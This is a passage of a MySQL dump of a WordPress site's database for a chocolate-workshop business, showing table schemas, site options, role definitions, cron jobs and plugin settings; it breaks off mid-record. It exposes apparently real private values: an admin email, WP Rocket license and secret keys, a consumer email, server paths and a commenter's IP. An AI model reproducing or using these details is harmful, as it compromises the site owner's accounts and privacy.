-- MySQL dump 10.14  Distrib 5.5.41-MariaDB, for Linux (x86_64)
--
-- Host: localhost    Database: chocoded_wp-28983-056178
-- ------------------------------------------------------
-- Server version	5.5.41-MariaDB

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `xrx_commentmeta`
--

DROP TABLE IF EXISTS `xrx_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xrx_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xrx_commentmeta`
--

LOCK TABLES `xrx_commentmeta` WRITE;
/*!40000 ALTER TABLE `xrx_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `xrx_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xrx_comments`
--

DROP TABLE IF EXISTS `xrx_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xrx_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT '0',
  `comment_author` tinytext COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_author_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT '0',
  `comment_approved` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xrx_comments`
--

LOCK TABLES `xrx_comments` WRITE;
/*!40000 ALTER TABLE `xrx_comments` DISABLE KEYS */;
INSERT INTO `xrx_comments` VALUES (1,291,'jwjshgsgshjs','','http://avababavvajhhwh.com/?jwjshgsgshjs_h00','217.23.7.126','2019-01-10 03:25:44','2019-01-10 01:25:44','<strong>jwjshgsgshjs</strong>\n\njwjshgsgshjs',0,'0','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','trackback',0,0);
/*!40000 ALTER TABLE `xrx_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xrx_links`
--

DROP TABLE IF EXISTS `xrx_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xrx_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_image` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_target` varchar(25) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_visible` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT '1',
  `link_rating` int(11) NOT NULL DEFAULT '0',
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_notes` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `link_rss` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xrx_links`
--

LOCK TABLES `xrx_links` WRITE;
/*!40000 ALTER TABLE `xrx_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `xrx_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xrx_options`
--

DROP TABLE IF EXISTS `xrx_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xrx_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `option_value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `autoload` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`)
) ENGINE=InnoDB AUTO_INCREMENT=38394 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xrx_options`
--

LOCK TABLES `xrx_options` WRITE;
/*!40000 ALTER TABLE `xrx_options` DISABLE KEYS */;
INSERT INTO `xrx_options` VALUES (1,'siteurl','https://www.chocolate4u.co.il','yes'),(2,'home','https://www.chocolate4u.co.il','yes'),(3,'blogname','שוקולד4U','yes'),(4,'blogdescription','סדנאות שוקולד','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','shmulik@shmul.co.il','yes'),(7,'start_of_week','0','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','j בF Y','yes'),(24,'time_format','G:i','yes'),(25,'links_updated_date_format','j בF Y G:i','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','/%postname%/','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins','a:12:{i:0;s:33:\"duplicate-post/duplicate-post.php\";i:1;s:31:\"elementor-pro/elementor-pro.php\";i:2;s:23:\"elementor/elementor.php\";i:3;s:50:\"google-analytics-for-wordpress/googleanalytics.php\";i:4;s:35:\"google-site-kit/google-site-kit.php\";i:5;s:35:\"insert-headers-and-footers/ihaf.php\";i:6;s:27:\"redirection/redirection.php\";i:7;s:48:\"simple-301-redirects/wp-simple-301-redirects.php\";i:8;s:17:\"wesafe/wesafe.php\";i:9;s:24:\"wordpress-seo/wp-seo.php\";i:10;s:23:\"wp-rocket/wp-rocket.php\";i:11;s:23:\"wp-smushit/wp-smush.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','a:5:{i:0;s:100:\"/home/chocoded/domains/chocolate4u.co.il/public_html/wp-content/themes/twentyseventeen/functions.php\";i:1;s:96:\"/home/chocoded/domains/chocolate4u.co.il/public_html/wp-content/themes/twentyseventeen/index.php\";i:2;s:97:\"/home/chocoded/domains/chocolate4u.co.il/public_html/wp-content/themes/twentyseventeen/footer.php\";i:3;s:96:\"/home/chocoded/domains/chocolate4u.co.il/public_html/wp-content/themes/twentyseventeen/style.css\";i:5;s:97:\"/home/chocoded/domains/chocolate4u.co.il/public_html/wp-content/themes/twentyseventeen/header.php\";}','no'),(40,'template','twentyseventeen','yes'),(41,'stylesheet','twentyseventeen','yes'),(42,'comment_whitelist','1','yes'),(43,'blacklist_keys','','no'),(44,'comment_registration','0','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','44719','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','1','yes'),(52,'default_link_category','2','yes'),(53,'show_on_front','page','yes'),(54,'tag_base','','yes'),(55,'show_avatars','1','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','300','yes'),(62,'medium_size_h','300','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','none','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','0','yes'),(70,'close_comments_days_old','14','yes'),(71,'thread_comments','1','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','0','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a:0:{}','yes'),(78,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(79,'widget_text','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(80,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(81,'uninstall_plugins','a:5:{s:50:\"google-analytics-for-wordpress/googleanalytics.php\";s:35:\"monsterinsights_lite_uninstall_hook\";s:17:\"wesafe/wesafe.php\";s:24:\"wesafe_deactivate_plugin\";s:23:\"elementor/elementor.php\";a:2:{i:0;s:21:\"Elementor\\Maintenance\";i:1;s:9:\"uninstall\";}s:27:\"redirection/redirection.php\";a:2:{i:0;s:17:\"Redirection_Admin\";i:1;s:16:\"plugin_uninstall\";}s:35:\"google-site-kit/google-site-kit.php\";s:30:\"googlesitekit_uninstall_plugin\";}','no'),(82,'timezone_string','Asia/Jerusalem','yes'),(83,'page_for_posts','0','yes'),(84,'page_on_front','7','yes'),(85,'default_post_format','0','yes'),(86,'link_manager_enabled','0','yes'),(87,'finished_splitting_shared_terms','1','yes'),(88,'site_icon','52','yes'),(89,'medium_large_size_w','768','yes'),(90,'medium_large_size_h','0','yes'),(91,'initial_db_version','38590','yes'),(92,'xrx_user_roles','a:7:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:63:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:20:\"wpseo_manage_options\";b:1;s:10:\"copy_posts\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:36:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:10:\"copy_posts\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:13:\"wpseo_manager\";a:2:{s:4:\"name\";s:11:\"SEO Manager\";s:12:\"capabilities\";a:37:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;s:20:\"wpseo_manage_options\";b:1;}}s:12:\"wpseo_editor\";a:2:{s:4:\"name\";s:10:\"SEO Editor\";s:12:\"capabilities\";a:36:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;}}}','yes'),(93,'fresh_site','0','yes'),(94,'widget_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(95,'widget_recent-posts','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(96,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(97,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(98,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(99,'sidebars_widgets','a:5:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:0:{}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:13:\"array_version\";i:3;}','yes'),(100,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(101,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(102,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(103,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(104,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(105,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(106,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(108,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(109,'cron','a:9:{i:1596712954;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1596714396;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1596726594;a:1:{s:19:\"wpseo-reindex-links\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1596732131;a:1:{s:23:\"rocket_purge_time_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:12:\"rocket_purge\";s:4:\"args\";a:0:{}s:8:\"interval\";i:36000;}}}i:1596738094;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1596785472;a:1:{s:22:\"redirection_log_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1596796927;a:2:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1596836528;a:1:{s:35:\"monsterinsights_usage_tracking_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}s:7:\"version\";i:2;}','yes'),(126,'elementor_version','2.9.8','yes'),(128,'theme_mods_twentyseventeen','a:4:{s:18:\"custom_css_post_id\";i:-1;s:18:\"nav_menu_locations\";a:1:{s:3:\"top\";i:2;}s:11:\"custom_logo\";i:191;s:12:\"header_image\";s:13:\"remove-header\";}','yes'),(140,'wp_rocket_settings','a:70:{s:16:\"secret_cache_key\";s:22:\"5b05457f32db8863058952\";s:12:\"cache_mobile\";i:1;s:23:\"do_caching_mobile_files\";i:0;s:17:\"cache_logged_user\";i:0;s:9:\"cache_ssl\";i:1;s:5:\"emoji\";i:1;s:6:\"embeds\";i:1;s:16:\"cache_reject_uri\";a:0:{}s:20:\"cache_reject_cookies\";a:0:{}s:15:\"cache_reject_ua\";a:0:{}s:19:\"cache_query_strings\";a:0:{}s:17:\"cache_purge_pages\";a:0:{}s:19:\"purge_cron_interval\";i:10;s:15:\"purge_cron_unit\";s:15:\"HOUR_IN_SECONDS\";s:11:\"exclude_css\";a:0:{}s:10:\"exclude_js\";a:0:{}s:12:\"defer_all_js\";i:0;s:17:\"defer_all_js_safe\";i:1;s:9:\"async_css\";i:0;s:12:\"critical_css\";s:0:\"\";s:8:\"lazyload\";i:0;s:16:\"lazyload_iframes\";i:0;s:16:\"lazyload_youtube\";i:0;s:10:\"minify_css\";i:0;s:14:\"minify_css_key\";s:22:\"5deabaa7589c7932427011\";s:22:\"minify_concatenate_css\";i:0;s:9:\"minify_js\";i:0;s:13:\"minify_js_key\";s:22:\"5deabaa7589cb581599361\";s:21:\"minify_concatenate_js\";i:0;s:19:\"minify_google_fonts\";i:1;s:11:\"minify_html\";i:0;s:14:\"manual_preload\";i:0;s:17:\"automatic_preload\";i:0;s:15:\"sitemap_preload\";i:0;s:25:\"sitemap_preload_url_crawl\";i:2000000;s:8:\"sitemaps\";a:0:{}s:20:\"remove_query_strings\";i:0;s:12:\"dns_prefetch\";a:0:{}s:18:\"database_revisions\";i:0;s:20:\"database_auto_drafts\";i:0;s:22:\"database_trashed_posts\";i:0;s:22:\"database_spam_comments\";i:0;s:25:\"database_trashed_comments\";i:0;s:27:\"database_expired_transients\";i:0;s:23:\"database_all_transients\";i:0;s:24:\"database_optimize_tables\";i:0;s:26:\"schedule_automatic_cleanup\";i:0;s:27:\"automatic_cleanup_frequency\";s:0:\"\";s:3:\"cdn\";i:0;s:10:\"cdn_cnames\";a:0:{}s:8:\"cdn_zone\";a:0:{}s:16:\"cdn_reject_files\";a:0:{}s:13:\"do_cloudflare\";i:0;s:16:\"cloudflare_email\";s:0:\"\";s:18:\"cloudflare_api_key\";s:0:\"\";s:17:\"cloudflare_domain\";s:0:\"\";s:18:\"cloudflare_zone_id\";s:0:\"\";s:18:\"cloudflare_devmode\";i:0;s:27:\"cloudflare_protocol_rewrite\";i:0;s:24:\"cloudflare_auto_settings\";i:0;s:23:\"cloudflare_old_settings\";s:0:\"\";s:18:\"varnish_auto_purge\";i:0;s:7:\"do_beta\";i:0;s:17:\"analytics_enabled\";i:0;s:12:\"consumer_key\";s:8:\"bc382482\";s:14:\"consumer_email\";s:15:\"nati@drubit.com\";s:10:\"secret_key\";s:8:\"4e11e157\";s:7:\"version\";s:5:\"3.0.4\";s:7:\"license\";i:1527072129;s:6:\"ignore\";b:1;}','yes'),(143,'_elementor_installed_time','1527072129','yes'),(144,'elementor_remote_info_library','a:3:{s:10:\"types_data\";a:2:{s:5:\"block\";a:1:{s:10:\"categories\";a:22:{i:0;s:8:\"404 page\";i:1;s:5:\"about\";i:2;s:7:\"archive\";i:3;s:14:\"call to action\";i:4;s:7:\"clients\";i:5;s:7:\"contact\";i:6;s:3:\"faq\";i:7;s:8:\"features\";i:8;s:6:\"footer\";i:9;s:6:\"header\";i:10;s:4:\"hero\";i:11;s:9:\"portfolio\";i:12;s:7:\"pricing\";i:13;s:15:\"product archive\";i:14;s:8:\"services\";i:15;s:11:\"single page\";i:16;s:11:\"single post\";i:17;s:14:\"single product\";i:18;s:5:\"stats\";i:19;s:9:\"subscribe\";i:20;s:4:\"team\";i:21;s:12:\"testimonials\";}}s:5:\"popup\";a:1:{s:10:\"categories\";a:6:{i:0;s:10:\"bottom bar\";i:1;s:7:\"classic\";i:2;s:6:\"fly-in\";i:3;s:11:\"full screen\";i:4;s:9:\"hello bar\";i:5;s:8:\"slide-in\";}}}s:10:\"categories\";a:22:{i:0;s:8:\"404 page\";i:1;s:5:\"about\";i:2;s:7:\"archive\";i:3;s:14:\"call to action\";i:4;s:7:\"clients\";i:5;s:7:\"contact\";i:6;s:3:\"faq\";i:7;s:8:\"features\";i:8;s:6:\"footer\";i:9;s:6:\"header\";i:10;s:4:\"hero\";i:11;s:9:\"portfolio\";i:12;s:7:\"pricing\";i:13;s:15:\"product archive\";i:14;s:8:\"services\";i:15;s:11:\"single page\";i:16;s:11:\"single post\";i:17;s:14:\"single product\";i:18;s:5:\"stats\";i:19;s:9:\"subscribe\";i:20;s:4:\"team\";i:21;s:12:\"testimonials\";}s:9:\"templates\";a:716:{i:0;a:14:{s:2:\"id\";i:5525;s:5:\"title\";s:8:\"About 